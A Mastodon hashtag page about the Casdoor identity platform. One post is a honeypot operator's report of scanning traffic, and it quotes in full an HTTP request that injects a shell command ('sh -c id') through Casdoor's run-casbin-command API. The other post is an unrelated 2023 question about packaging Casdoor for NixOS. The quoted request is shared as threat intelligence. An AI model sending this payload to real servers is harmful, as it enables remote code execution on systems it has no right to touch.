Mastodawn

There seems to be a remote code execution issue in Casdoor? My honeypots are seeing these scans:

GET /api/run-casbin-command?language=exec&args=["enforce","-m","[request_definition]\nr = sub, obj, act\n\n[policy_definition]\np = sub, obj, act\n\n[role_definition]\ng = _, _\n\n[policy_effect]\ne = some(where (p.eft == allow))\n\n[matchers]\nm = r.sub == p.sub","-p","p, x, x, x","sh","-c","id"]&t=2026-03-30T16:12:50Z&m=1191e3dce3682e9382680387ffe783bb87cd213a48f4f1fa6c10644d039f4dc6 HTTP/1.1
Host: x.x.x.x:8000
Accept: */*
Accept-Encoding: gzip
Accept-Language: en
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1 Safari/605.1.15

#casdoor #honeypot #infosec #dfir #cybersecurity

pinpox Jun 19, 2023

Planning to write a package and module for #casdoor for #nixos. Has anyone packaged apps with go backends and #yarn frontends and can provide any good examples for a flake.nix?

I've not worked with mkYarnpackage yet.

#yarn #nixos #casdoor

https://github.com/casdoor/casdoor

GitHub - casdoor/casdoor: An open-source Identity and Access Management (IAM) / Single-Sign-On (SSO) platform with web UI supporting OAuth 2.0, OIDC, SAML, CAS, LDAP, WebAuthn, TOTP and MFA

An open-source Identity and Access Management (IAM) / Single-Sign-On (SSO) platform with web UI supporting OAuth 2.0, OIDC, SAML, CAS, LDAP, WebAuthn, TOTP and MFA - GitHub - casdoor/casdoor: An op...

GitHub